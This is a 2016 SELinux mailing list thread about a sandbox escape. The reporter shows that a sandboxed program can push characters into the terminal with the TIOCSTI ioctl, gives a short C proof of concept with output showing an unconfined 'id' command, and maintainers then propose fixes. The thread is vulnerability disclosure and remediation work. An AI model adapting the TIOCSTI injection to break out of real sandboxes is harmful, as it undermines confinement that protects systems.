On 09/23/2016 09:28 AM, Paul Moore wrote:
> On Fri, Sep 23, 2016 at 5:23 AM, <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
>> Hi,
>>
>> When executing a program via the SELinux sandbox, the nonpriv session can
>> escape to the parent session by using the TIOCSTI ioctl to push characters
>> into the terminal's input buffer, allowing an attacker to escape the
>> sandbox.
>>
>> $ cat test.c
>> #include <unistd.h>
>> #include <sys/ioctl.h>
>>
>> int main()
>> {
>> char *cmd = "id\n";
>> while(*cmd)
>> ioctl(0, TIOCSTI, cmd++);
>> execlp("/bin/id", "id", NULL);
>> }
>>
>> $ gcc test.c -o test
>> $ /bin/sandbox ./test
>> id
>> uid=1000 gid=1000 groups=1000
>> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
>> $ id <------ did not type this
>> uid=1000(saken) gid=1000(saken) groups=1000(saken)
>> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> I've only just started looking at this, but it seems like we need a
> call to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after
> the sandboxed process exits. Do any of the userspace tools guys have
> any other ideas?
Normally this is handled via setsid() or via a pty interposer.
seunshare does call setsid(), so I believe that sandbox -X or -M are not
susceptible to this, but sandbox without those options does not use
seunshare. run_init for example uses a pty interposer. Another
alternative would be to use the ioctl whitelisting support added by
Android to block use of TIOCSTI by the sandbox domains, but it is
unclear if that is sufficient.
_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx
To unsubscribe, send email to Selinux-leave@xxxxxxxxxxxxx.
To get help, send an email containing "help" to Selinux-request@xxxxxxxxxxxxx.
